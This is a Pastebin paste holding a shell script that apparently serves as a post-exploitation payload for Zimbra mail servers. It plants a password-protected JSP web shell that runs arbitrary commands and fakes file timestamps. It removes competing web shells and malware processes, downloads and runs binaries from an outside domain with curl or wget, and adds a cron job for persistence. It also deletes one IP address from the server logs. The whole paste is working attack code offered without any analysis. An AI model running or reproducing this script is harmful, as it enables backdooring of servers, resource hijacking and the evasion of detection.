Guest User

Untitled

a guest
Jun 17th, 2019
562
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/sh
  2. echo "whoami"
  3. if [ -f '/opt/zimbra/cbpolicyd/bin/cbpolicyd' ]; then
  4. MON_PROC='/opt/zimbra/cbpolicyd/bin/cbstat'
  5. else
  6. MON_PROC='/opt/zimbra/lib/zmiostat'
  7. fi
  8. BX_FILE='/opt/zimbra/jetty/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp'
  9. touch $BX_FILE -r /opt/zimbra/jetty/webapps/zimbra/js/zimbra/csfe/ZmCsfeResult.js
  10. STATIC_FILE='/opt/zimbra/jetty/webapps/zimbra/public/Ajax.jsp'
  11. if [ ! -f $STATIC_FILE ]; then
  12. chmod 777 /opt/zimbra/jetty/webapps/zimbra/public
  13. echo "<%if(\"LVdpVsmayetL6cvL2YToniYg\".equals(request.getParameter(\"ppwd\"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{\"/bin/sh\",\"-c\", request.getParameter(\"pcom\")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print(\"<pre>\");while((a=in.read(b))!=-1){out.print(new String(b, 0, a));}out.print(\"</pre>\");}%>" > $STATIC_FILE
  14. chmod 544 /opt/zimbra/jetty/webapps/zimbra/public
  15. ls -l $STATIC_FILE
  16. fi # -f $STATIC_FILE
  17. touch $STATIC_FILE -r /opt/zimbra/jetty/webapps/zimbra/public/Boot.jsp
  18. touch /opt/zimbra/jetty/webapps/zimbra/public/login.jsp -r /opt/zimbra/jetty/webapps/zimbra/public/Boot.jsp
  19. if [ -f $STATIC_FILE ]; then
  20. chmod 777 /opt/zimbra/jetty/webapps/zimbra/downloads
  21. chmod 777 /opt/zimbra/jetty/webapps/zimbra/public/jsp/infoc.jsp > /dev/null 2>&1
  22. rm  /opt/zimbra/jetty/webapps/zimbra/public/jsp/infoc.jsp -f > /dev/null 2>&1
  23. chmod 777 /opt/zimbra/jetty/webapps/zimbra/public/jsp/BootCore.jsp > /dev/null 2>&1
  24. rm  /opt/zimbra/jetty/webapps/zimbra/public/jsp/BootCore.jsp -f > /dev/null 2>&1
  25. chmod 777 /opt/zimbra/jetty/webapps/zimbra/public/jsp/ShareCore.jsp > /dev/null 2>&1
  26. rm  /opt/zimbra/jetty/webapps/zimbra/public/jsp/ShareCore.jsp -f > /dev/null 2>&1
  27. chmod 777 /opt/zimbra/jetty/webapps/zimbra/public/jsp/ZimbraCore.jsp > /dev/null 2>&1
  28. rm  /opt/zimbra/jetty/webapps/zimbra/public/jsp/ZimbraCore.jsp -f > /dev/null 2>&1
  29. chmod 777 /opt/zimbra/jetty/webapps/zimbra/public/Online.jsp > /dev/null 2>&1
  30. rm  /opt/zimbra/jetty/webapps/zimbra/public/Online.jsp -f > /dev/null 2>&1
  31. chmod -R 777 /opt/zimbra/jetty/webapps/zimbra/public/404.jsp > /dev/null 2>&1
  32. rm  /opt/zimbra/jetty/webapps/zimbra/public/404.jsp -f > /dev/null 2>&1
  33. rm  /opt/zimbra/jetty/webapps/zimbra/downloads/*.jsp -rf > /dev/null 2>&1
  34. find /opt/zimbra/jetty/webapps -name "*.jsp"|xargs grep -ri "exec(" -l | grep -v "service/error/attachment_blocked.jsp" | grep -v "zimbraAdmin/public/jsp/Debug.jsp" | grep -v "portals/example/static.jsp" | grep -v "public/jsp/CryptCore" | grep -v "public/Ajax.jsp" | xargs rm -f
  35. find /opt/zimbra/jetty/webapps -name "*.jsp"|xargs grep -ri "ClassLoader" -l | grep -v "zimbra/csfe/XZimbra.jsp" | grep -v "public/jsp/Alert.jsp" | xargs rm -f
  36. else
  37. echo "!ajax"
  38. fi
  39. rm -rf /opt/zimbra/jetty/webapps/service/error/404.jsp > /dev/null 2>&1
  40. chmod -R 455 /opt/zimbra/jetty/webapps/zimbra/downloads
  41. chmod -R -w /opt/zimbra/data/tmp/upload
  42. ps aux | grep /tmp/.cache | grep -v grep| awk '{print "kill -9 "$2}' | sh
  43. ps aux | grep /bin/bash | grep -v grep| awk '{print "kill -9 "$2}' | sh;rm -rf /tmp/.cache/*
  44. ps aux | grep /tmp/.cache/.kthrotlds | grep -v grep| awk '{print "kill -9 "$2}' | sh
  45. (crontab -l|grep -v "zmstorewatch")|crontab -
  46. (crontab -l|grep -v "tmp/.cache/")|crontab -
  47. (crontab -l|grep -v "tor2web.")|crontab -
  48. (crontab -l|grep -v "wget")|crontab -
  49. (crontab -l|grep -v "curl")|crontab -
  50. (crontab -l|grep -v "zmswatch.sh"|grep -v "zmlogswatch")|crontab -
  51. AGENT_FILE='/opt/zimbra/log/zmswatch'
  52. STORE_FILE="/opt/zimbra/lib/zmstorewatch"
  53. WATCH_FILE="/opt/zimbra/lib/zmmailboxdwatch"
  54. if [ -f $STORE_FILE ]; then
  55. file1=$WATCH_FILE
  56. else
  57. file1=$AGENT_FILE
  58. fi
  59. ps aux | grep "/tmp/s.sh" | awk '{print "kill -9 "$2}' | sh
  60. ps aux | grep "/tmp/l.sh" | awk '{print "kill -9 "$2}' | sh
  61. ps auxf | grep -v grep | grep "zmcat" | awk '{print $2}' | xargs kill -9
  62. pkill -9 zmcat
  63. ps auxf | grep -v grep | grep 'zmmailboxdwatch' | awk '{print $2}' | xargs kill -9
  64. pkill -9 zmmailboxdwatch
  65. chmod 777 /opt/zimbra/lib/zmmailboxdwatch
  66. rm -f /opt/zimbra/lib/zmmailboxdwatch > /dev/null 2>&1
  67. ps auxf | grep -v grep | grep 'zmstorewatch' | awk '{print $2}' | xargs kill -9
  68. pkill -9 zmstorewatch
  69. chmod 777 /opt/zimbra/lib/zmstorewatch
  70. rm -f /opt/zimbra/lib/zmstorewatch > /dev/null 2>&1
  71. ps aux | grep -v zmswatch | awk '{if($3>50.0) print "kill -9 "$2}' | sh
  72. rm -f /tmp/.cache/.ntp > /dev/null 2>&1
  73. rm -f /tmp/*.sh > /dev/null 2>&1
  74. rm -f /tmp/zmcat > /dev/null 2>&1
  75. rm -f /opt/zimbra/conf/zmsstorewatch.cnf > /dev/null 2>&1
  76. rm -f /opt/zimbra/conf/zmsstore.cnf > /dev/null 2>&1
  77. U=https://wordpress.ulimit-n.com/wp-updates/gKLjD8qd/wl_41mx.zip
  78. if ps auxf | grep -v grep | grep "$AGENT_FILE" > /dev/null; then # running
  79. echo "zmswatch_running" # running
  80. else # running
  81. if [ -f $AGENT_FILE ]; then
  82. filesize=`ls -l $AGENT_FILE | awk '{ print $5}'`
  83. if  [ $filesize -ne 999112 ];then
  84. rm -rf $AGENT_FILE
  85. fi
  86. fi
  87. if [ ! -f $AGENT_FILE ]; then
  88. if command -v curl > /dev/null 2>&1; then
  89. echo 'curl'
  90. curl -k $U -o $AGENT_FILE
  91. elif command -v wget > /dev/null 2>&1; then
  92. echo 'wget'
  93. wget --no-check-certificate $U -O $AGENT_FILE
  94. else
  95. wget --no-check-certificate $U -O $AGENT_FILE
  96. fi
  97. fi # -f AGENT_FILE
  98. if [ ! -x $AGENT_FILE ]; then
  99. echo 'chmod'
  100. chmod +x $AGENT_FILE
  101. fi
  102. nohup $AGENT_FILE > /dev/null 2>&1 &
  103. if ps auxf | grep -v grep | grep "$AGENT_FILE" > /dev/null; then
  104. echo "zmswatch_nohup"
  105. else
  106. echo "zmswatch_nonstart"
  107. fi
  108. fi # running
  109. U2=https://wordpress.ulimit-n.com/wp-updates/gKLjD8qd/watch.zip
  110. if [ ! -f $MON_PROC ]; then
  111. if command -v curl > /dev/null 2>&1; then
  112. curl -k $U2 -o $MON_PROC
  113. elif command -v wget > /dev/null 2>&1; then
  114. wget --no-check-certificate $U2 -O $MON_PROC
  115. else
  116. wget --no-check-certificate $U2 -O $MON_PROC
  117. fi
  118. fi # -f AGENT_FILE
  119. if [ ! -x $MON_PROC ]; then
  120. chmod +x $MON_PROC
  121. fi
  122. if [ ! -f $MON_PROC ]; then
  123. echo "$MON_PROC not exist!"
  124. else
  125. ls -l $MON_PROC
  126. fi
  127. ps -ef | grep $MON_PROC | grep -v grep
  128. if [ $? -ne 0 ]; then
  129. nohup $MON_PROC > /dev/null 2>&1 &
  130. if ps auxf | grep -v grep | grep -v "$MON_PROC" > /dev/null; then
  131. echo "zmlogswatch_nohup"
  132. else
  133. echo "zmlogswatch_nonstart"
  134. fi
  135. else
  136. echo "zmlogswatch_running"
  137. fi
  138. SH_FILE='/opt/zimbra/log/zmswatcher'
  139. echo "#!/bin/sh" >$SH_FILE
  140. echo "if ps auxf | grep -v grep | grep \"$AGENT_FILE\" > /dev/null; then" >>$SH_FILE #error
  141. echo "  echo \"$AGENT_FILE running\"" >>$SH_FILE
  142. echo "else" >>$SH_FILE
  143. echo "  echo \"$AGENT_FILE nohup\"" >>$SH_FILE
  144. echo "  nohup $AGENT_FILE > /dev/null 2>&1 &" >>$SH_FILE
  145. echo "fi" >>$SH_FILE
  146. if [ -f $SH_FILE ]; then
  147. chmod +x $SH_FILE
  148. (crontab -l | grep -v "$SH_FILE";printf "*/30 * * * * $SH_FILE\n") | crontab -
  149. fi
  150.  
  151.  
  152. sed -i '/111\.165\.4\.177/d' /opt/zimbra/log/*_log.2019-06-*
  153. sed -i '/111\.165\.4\.177/d' /opt/zimbra/log/nginx.access.log
RAW Paste Data